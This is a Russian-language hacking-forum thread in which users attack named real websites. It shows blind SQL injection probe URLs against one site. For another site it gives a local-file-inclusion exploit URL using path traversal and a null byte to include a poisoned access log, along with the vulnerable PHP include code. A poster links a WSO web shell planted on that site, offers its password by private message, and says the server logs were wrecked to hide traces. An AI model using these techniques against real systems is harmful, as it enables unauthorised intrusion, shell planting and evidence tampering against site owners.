Сообщение от
XAMEHA
Посимвольным перебором ASCII через AND или ORDER BY.
Там фильтруется select(юнион кстати тоже)
http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- - >> true
http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63-- select >> false
А без селекта ты ничего не добъешься, кроме вывода стандартных функций, ну узнаешь ты номер версии посимвольным перебором, и?
Сообщение от
ta-kyn
2Tigger я ручками перебирал. 1. Кстати, что можете посоветовать для автоперебора? (с поддержкой прокси желательно) 2. Странно что в мод_секьюрити не запрещена ф-ия copy()? 3. Для инклуда логов есть только 1-а попытка (при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?
http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&c=;
user agent:
Ну а дальше масса вариантов.
http://www.libertarias.com/wso.php
Пасс держи в пм по понятным причинам, также по понятным причинам пришлось запороть оба лога.
Cам инклюд в коде
index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'op'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$busqueda[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
include([/COLOR][COLOR="#DD0000"]"op/[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Тоже пофикшен, по понятным причинам, т.к. автор вопроса получил и ответ и шелл в пм.